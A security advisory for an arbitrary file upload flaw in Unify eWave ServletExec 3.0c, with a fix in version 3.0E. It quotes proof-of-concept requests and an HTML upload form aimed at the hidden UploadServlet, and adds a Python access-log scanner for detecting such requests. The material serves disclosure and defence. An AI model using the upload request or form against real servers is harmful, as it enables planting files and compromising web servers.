Unify eWave ServletExec File Upload Vulnerability
BID:1876
Info
| Bugtraq ID: | 1876 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2000 12:00AM |
| Updated: | Oct 31 2000 12:00AM |
| Credit: | Discovered and posted in a Foundstone Labs <[email protected]> Security Advisory <FS-103100-16-SRVX> on Oct 31, 2000. |
| Vulnerable: | Unify eWave ServletExec 3.0 c |
| Not Vulnerable: | |
Discussion
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
ServletExec contains an unregistered servlet called 'UploadServlet'. By sending a specially formed HTTP or 'GET' request, a remote user can upload any file to any directory on the server where ServletExec resides. The vulnerability can also be exploited by a user who creates an HTML form on their local system and uses it to submit an arbitrary file to the servlet in question.
Successful exploitation of this vulnerability could lead to a compromise of the web server.
The following examples are provided by Foundstone Labs <[email protected]>:
HTTP and 'GET' request:
nc target
GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
or
http://target/servlet/com.unify.ewave.servletexec.UploadServlet
HTML form:
<FORM METHOD=POST ENCTYPE='multipart/form-data'
ACTION='http://target/servlet/com.unify.ewave.servletexec.UploadServlet'>
<P>
Upload Directory:
<INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
<P>
File to Upload:
<INPUT TYPE=FILE SIZE=35 NAME=File1>
<P>
<INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
</FORM>
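A log check for the servlet path shown in the examples above, as an added example that is not part of the advisory: it scans web server access-log lines for requests to UploadServlet, including percent-encoded variants. The Common Log Format layout, the case-insensitive match and the sample lines (constructed, using documentation addresses) are assumptions.

```python
import re
from urllib.parse import unquote

# Servlet path from the advisory's examples, lowercased for comparison.
SERVLET = "/servlet/com.unify.ewave.servletexec.uploadservlet"

# Assumed Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def normalize(target):
    """Percent-decode (up to 3 rounds, to catch double encoding), drop any
    query string or path parameters, collapse slashes and lowercase."""
    path = target
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = re.split(r"[?;]", path, maxsplit=1)[0]
    return re.sub(r"/+", "/", path).lower()

def find_upload_servlet_hits(lines):
    """Return (host, time, method, status, kind) for each request to the servlet."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a parseable access-log line
        host, when, method, target, status = m.groups()
        path = normalize(target)
        if path == SERVLET or path.startswith(SERVLET + "/"):
            # The advisory's HTML form submits with METHOD=POST.
            kind = "form-post" if method.upper() == "POST" else "request"
            hits.append((host, when, method, int(status), kind))
    return hits

# Constructed sample log lines, not real traffic.
SAMPLE = [
    '192.0.2.10 - - [31/Oct/2000:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.44 - - [31/Oct/2000:10:05:11 +0000] "GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0" 200 512',
    '192.0.2.44 - - [31/Oct/2000:10:05:40 +0000] "POST /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0" 200 87',
    '198.51.100.7 - - [31/Oct/2000:11:20:00 +0000] "GET /servlet/com.unify.ewave.servletexec.%55ploadServlet HTTP/1.0" 404 0',
    '198.51.100.7 - - [31/Oct/2000:11:21:00 +0000] "GET /servlet/HelloWorld HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for hit in find_upload_servlet_hits(SAMPLE):
        print(hit)
```

Any hit with a 2xx status on a server that has not been upgraded is worth following up by reviewing files written around the logged time.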
Exploit / POC
Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution / Fix
Solution:
This vulnerability has been addressed in ServletExec version 3.0E.